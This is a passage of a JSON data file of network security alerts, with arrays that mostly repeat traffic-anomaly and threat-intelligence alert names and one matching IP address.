of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Possible contact with a domain generated by a DGA\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Microsoft Threat Intelligence Analytics\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\",\"Time series anomaly detection for total volume of\\ntraffic\"],\"MatchingIps\":[[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"],[\"3.88.48.125\"]